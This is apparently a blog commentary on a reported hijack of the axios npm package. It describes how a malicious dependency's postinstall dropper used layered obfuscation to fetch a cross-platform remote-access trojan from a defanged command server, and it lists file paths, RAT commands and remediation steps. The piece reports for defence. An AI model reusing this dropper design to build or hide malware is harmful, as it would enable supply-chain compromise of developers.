Your CI/CD pipeline hums along at 2 a.m. npm install axios. Boom—RAT burrows in. Cross-platform. Stealthy. Gone in 60 seconds.
And just like that, the JavaScript world’s favorite HTTP client turns traitor. Axios—over 100 million weekly downloads—got hijacked on March 31, 2026. Two bogus versions, 1.14.1 and 0.30.4, live for two hours. Enough time to wreck havoc if your lockfile was fresh.
Who Let the RATs Out?
Maintainer account pwned. @jasonsaayman, they say—high perms, slow fix. No source code touched. Sneaky dependency: [email protected]. Prepped 18 hours early, like a pro heist.
postinstall hook fires. node setup.js. Double-obfuscated dropper—reversed Base64, XOR with OrDeR_7077 key. Calls home to sfrclak[.]com:8000. Grabs platform-specific payload. Then? Poof. Self-erasing. Deletes itself, swaps package.json with a fake.
Clever bastards.
The attacker did not modify any Axios source files directly. Instead, they added a pre-staged malicious dependency, [email protected], to the package.json of the new axios releases.
That’s the money quote from the Snyk advisory. Straight fire—shows how supply chain attacks evolve. Not typosquatting anymore. Real access, real pain.
MacOS, Windows, Linux: No One Spared
Apple fans? AppleScript fakes a daemon in /Library/Caches/com.apple.act.mond. Fingerprints your Mac—hostname, user, processes. Beacons every 60 seconds with a bogus IE8 UA. Commands? peinject for unsigned binaries (codesign hack), runscript for shell/osascript, rundir for app snooping, kill to bail.
Windows? VBS drops PowerShell RAT as wt.exe in PROGRAMDATA. Execution policy? Bypassed.
Linux gets Python in /tmp/ld.py, nohup’d into oblivion.
Universal compromise. Your dev box, CI runner—pick your poison.
Secondary hits too: @qqbrowser/openclaw-qbot and @shadanai/openclaw. Same dirty dep. Coordinated? Or just opportunistic? Smells like a kit.
Did npm Just Admit Defeat?
Here’s my hot take—the one nobody’s saying. This echoes SolarWinds 2020, but npm’s worse: zero vetting on maintainers. GitHub perms? Nice try. One compromised key, and it’s game over for millions. Prediction: npm won’t mandate 2FA till the next big one. They’ll tweet “lessons learned,” devs keep pinning versions like it’s 2015. Wake up, npm. You’re a registry, not a trust fund.
Immediate fix? Audit lockfiles. Rotate secrets. Snyk’s got advisories—SNYK-JS-AXIOS-15850774 et al. Safe? Anything but those two versions.
But let’s be real. How many unchecked pipelines out there? Enterprises patting themselves on the back for Dependabot, while indie devs npm i away.
Dry humor time: Axios makes HTTP calls safe. Till it makes RAT calls instead.
Why Does This Matter for Every JS Dev?
You’re not paranoid if they really are out to get you. 100M downloads weekly? That’s every Node project, React app, Electron desktop. Your Vercel deploy? GitHub Actions? If they pulled fresh during 01:29-03:29 UTC, congrats—you might’ve invited squatters.
npm yanked ‘em fast. But damage? Unknown. C2 server lit up? Victims beaconing? Attackers got persistence, command exec, binary drops. Nation-state? Ransomware crew? Who knows—sfrclak[.]com ain’t talking.
And the PR spin? Axios GitHub thread’s a circus. Collaborators scrambling, perms yanked. Too late, fellas.
Worse: Bun, Yarn—same vuln if they resolve deps. Package managers united in fragility.
Look, I’ve railed against npm bloat before. Time to pin, audit, maybe—gasp—self-host binaries. Or watch the next maintainer sip piña coladas in Belarus.
The Bigger Picture: Supply Chain’s Fragile Underbelly
Supply chain attacks aren’t new. XZ Utils last year, nearly backdoored SSH. But JS? Playground for script kiddies turned pros. plain-crypto-js staged clean, then poisoned. That’s opsec.
Unique angle: This RAT’s modularity screams reuse. peinject on Mac? That’s APT-level. Expect copycats on React, Lodash next. npm’s scale is the feature, not the bug.
Devs, run npm ls plain-crypto-js. Nothing? Good—or just well-erased. Tools like Socket, Sigstore—use ‘em. Or don’t, and enjoy the show.
Skeptical? Yeah. Axios team’ll patch perms, but humans click phishing. Always will.
🧬 Related Insights
- Read more: Open Source ROI: Do Companies Get Suckered into Free Labor?
- Read more: GitLab Ditches NIST’s 1,000+ Controls for a Bespoke Security Fortress
Frequently Asked Questions
What happened to the axios npm package?
Two versions (1.14.1, 0.30.4) published via hijacked maintainer. Added RAT via plain-crypto-js dep. Live two hours, yanked by 03:29 UTC March 31, 2026.
Is my machine safe if I installed axios recently?
Check lockfile/package-lock.json for those versions or [email protected]. No postinstall traces left, but audit secrets, scan for sfrclak[.]com traffic.
How to prevent npm supply chain attacks?
Pin versions, use lockfiles, enable 2FA everywhere, audit deps with Snyk/Socket. Consider npm audit fix, but verify.
